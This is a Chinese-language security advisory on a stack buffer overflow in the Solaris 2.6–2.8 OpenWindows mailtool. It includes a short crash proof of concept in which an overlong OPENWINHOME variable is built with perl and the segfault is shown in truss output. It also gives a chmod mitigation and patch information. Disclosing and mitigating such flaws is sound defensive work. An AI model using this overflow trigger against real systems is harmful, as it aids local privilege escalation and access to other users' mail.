|
受影响的系统:
Sun Solaris 2.8 (SPARC/x86)
Sun Solaris 2.7 (SPARC/x86)
Sun Solaris 2.6 (SPARC/x86) 不受影响系统: 描述: Solaris OpenWindows所带的一个邮件工具:mailtool存在缓冲区溢出漏洞。本地攻击者可以利用这个漏洞获取'mail'组权限,这将允许攻击者查看/篡改其他用户的邮件,可能导致进一步的权限提升。 当将环境变量OPENWINHOME设置成一个超长的字符串时,例如超过1010字节长,将触发一个基于堆栈的缓冲区溢出,小心地构造字符串内容,攻击者可以以mail组权限执行任意代码。 测试程序: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
bash-2.03# eXPort OPENWINHOME=`perl -e 'print "A"x1010'`
bash-2.03# mailtool
Segmentation Fault `truss` output:
Incurred fault #6, FLTBOUNDS %pc = 0xDF8BD448
siginfo: SIGSEGV SEGV_MAPERR addr=0x4141414D
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x4141414D
*** process killed *** 建议: 临时解决方法: 建议您暂时去掉mailtool的sgid mail属性:
# chmod g-s /usr/openwin/bin/mailtool 厂商补丁: Sun已经得知此问题,正在着手开发补丁。您可以随时关注厂商主页以获取最新的补丁:
 http://sunsolve.sun.com/ ;
|
